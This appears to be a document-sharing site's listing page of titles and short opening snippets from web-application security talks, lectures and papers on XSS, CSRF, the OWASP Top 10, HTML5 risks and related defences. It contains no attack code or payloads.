Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies (@slekies) / Ben Stock (@kcotsneb) Martin Johns (@datenkeller) Agenda The Same-Origin Policy Cross-Site Script Inclusion (XSSI) Generalizing
More informationMatch the attack to its description:
Match the attack to its description: 8 7 5 6 4 2 3 1 Attacks: Using Components with Known Vulnerabilities Missing Function Level Access Control Sensitive Data Exposure Security Misconfiguration Insecure
More informationIBM Bluemix Node-RED Watson Starter
IBM Bluemix Node-RED Watson Starter Cognitive Solutions Application Development IBM Global Business Partners Duration: 45 minutes Updated: Feb 14, 2018 Klaus-Peter Schlotter kps@de.ibm.com Version 1 Overview
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
More informationWeb Security. Thierry Sans
Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web
More informationThis is CS50. Harvard College Fall Quiz 1 Answer Key
Quiz 1 Answer Key Answers other than the below may be possible. Know Your Meme. 0. True or False. 1. T 2. F 3. F 4. F 5. T Attack. 6. By never making assumptions as to the length of users input and always
More informationCNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies
CNIT 129S: Securing Web Applications Ch 3: Web Application Technologies HTTP Hypertext Transfer Protocol (HTTP) Connectionless protocol Client sends an HTTP request to a Web server Gets an HTTP response
More informationPreparing for the Cross Site Request Forgery Defense
Preparing for the Cross Site Request Forgery Defense By Chuck Willis chuck.willis@mandiant.com Presented at Black Hat Briefings DC 2008 on February 20, 2008 Slides available at www.blackhat.com. Abstract:
More informationXignite CloudStreaming overview
Xignite CloudStreaming overview Objectives Terminology Zero footprint Easy to implement Open standards Sample code Simple javascript implementation Handling patch messages Including error handling Using
More informationHTML5 a clear & present danger
HTML5 a clear & present danger Renaud Bidou CTO 1/29/2014 Deny All 2012 1 1/29/2014 Deny All 2013 1 Menu 1. HTML5 new capabilities 2. HTML5 tricks 3. Empowering common threats 4. Hackers dreams come true
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationWeb Vulnerabilities. And The People Who Love Them
Web Vulnerabilities And The People Who Love Them Me Tom Hudson Technical Trainer at Sky Betting & Gaming TomNomNom online Occasional bug hunter Lover of analogies Lover of questions Insecure Direct Object
More informationAbusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)
Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page
More informationHacking ASUS Routers: A Case Study. By Yakov Shafranovich October 8th, 2017
Hacking ASUS Routers: A Case Study By Yakov Shafranovich yakov@nightwatchcybersecurity.com October 8th, 2017 About Me I was a software developer most of my career Security bug bounty hunter on the side
More informationComputer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general
More informationSichere Webanwendungen mit Java
Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP
More informationWeb Security, Part 2
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationXSSFor the win! What can be really done with Cross-Site Scripting.
XSSFor the win! What can be really done with Cross-Site Scripting by @brutelogic Whoami Security Researcher at Sucuri Security (a GoDaddy company) XSS, filter/waf bypass and bash! Helped to fix more than
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationGOING WHERE NO WAFS HAVE GONE BEFORE
GOING WHERE NO WAFS HAVE GONE BEFORE Andy Prow Aura Information Security Sam Pickles Senior Systems Engineer, F5 Networks NZ Agenda: WTF is a WAF? View from the Trenches Example Attacks and Mitigation
More informationHTML5: Something wicked this way comes. Krzysztof Kotowicz Securing
HTML5: Something wicked this way comes Krzysztof Kotowicz Securing 1 About me security researcher HTML 5 UI redressing / clickjacking xss-track, squid-imposter,... pentester IT security trainer Hacking
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationESORICS September Martin Johns
SessionSafe: Implementing XSS Immune SessionHandling Universität Hamburg ESORICS 06 20. September 2006 Martin Johns Fachbereich Informatik SVS Sicherheit in Verteilten Systemen Me, myself and I Martin
More informationProgress Exchange June, Phoenix, AZ, USA 1
1 COMP-1: Securing your web application against hackers Edwin Lijnzaad & Ronald Smits Consultants Agenda Introduction Issues How to... Questions 2 COMP-1: Securing your web application against hackers
More informationFounded the web application security lab
Robert RSnake Hansen - CEO SecTheory LLC Bespoke Boutique Internet Security Web Application/Browser Security Network/OS Security Advisory capacity to VCs/start-ups We solve tough problems. http://www.sectheory.com/
More informationW3Conf, November 15 & 16, Brad Scott
The Future of Web Application Security W3Conf, November 15 & 16, 2011 Brad Hill @hillbrad bhill@paypal-inc.com Scott Stender @scottstender scott@isecpartners.com The History of Web App Security Attacker
More informationTop 10 Web Application Vulnerabilities
Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other
More informationSecure Coding and Code Review. Berlin : 2012
Secure Coding and Code Review Berlin : 2012 Outline Overview of top vulnerabilities Code review practice Secure design / writing secure code Write some secure code Review a volunteer's code Top Problems
More informationThe three faces. DeepSec Martin Johns University of Hamburg Universität Hamburg
The three faces of CSRF Universität Hamburg DeepSec 2007 23.11.2007 Martin Johns University of Hamburg johns@informatik.uni-hamburg.de Fachbereich Informatik SVS Sicherheit in Verteilten Systemen Me, myself
More informationWebGoat& WebScarab. What is computer security for $1000 Alex?
WebGoat& WebScarab What is computer security for $1000 Alex? Install WebGoat 10 Download from Google Code 20 Unzip the folder to where ever you want 30 Click on WebGoat.bat 40 Goto http://localhost/webgoat/attack
More informationColdFusion Application Security: The Next Step - Handout
ColdFusion Application Security: The Next Step - Handout Jason Dean http://www.12robots.com Boston CFUG September 16 th, 2009 REQUEST FORGERIES A request forgery, also sometimes called a Cross-Site (or
More informationWelcome to the OWASP TOP 10
Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA
More informationWeb Application Security
Web Application Security Rajendra Kachhwaha rajendra1983@gmail.com October 16, 2015 Lecture 16: 1/ 14 Outline Browser Security Principles: 1 Cross Site Scripting (XSS) 2 Types of XSS 3 Lecture 16: 2/ 14
More informationClojure Web Security. FrOSCon Joy Clark & Simon Kölsch
Clojure Web Security FrOSCon 2016 Joy Clark & Simon Kölsch Clojure Crash Course (println "Hello Sankt Augustin!") Lisp + JVM Functional programming language Simple programming model Immutable Data Structures
More informationINF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015
INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3
More informationWeb Security: Web Application Security [continued]
CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security [continued] Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,
More informationHigh -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018
HTB_WEBSECDOCS_v1.3.pdf Page 1 of 29 High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018 General Overview... 2 Meta-information... 4 HTTP Additional
More informationCookie Security. Myths and Misconceptions. David Johansson OWASP London 30 Nov. 2017
Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me David Johansson (@securitybits) Security consultant with 10 years in AppSec Helping clients design and build
More informationJquery Ajax Json Php Mysql Data Entry Example
Jquery Ajax Json Php Mysql Data Entry Example Then add required assets in head which are jquery library, datatable js library and css By ajax api we can fetch json the data from employee-grid-data.php.
More informationCross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web
More informationTransparency & Consent Framework
Transparency & Consent Framework Consent Manager Provider JS API v1.0 Table of Contents Introduction... 2 About the Transparency & Consent Framework... 2 About the Transparency & Consent Standard... 3
More informationCross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft
Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft Who are we? Chris Evans Troublemaker, Engineer, Tech Lead, Google Security Team
More information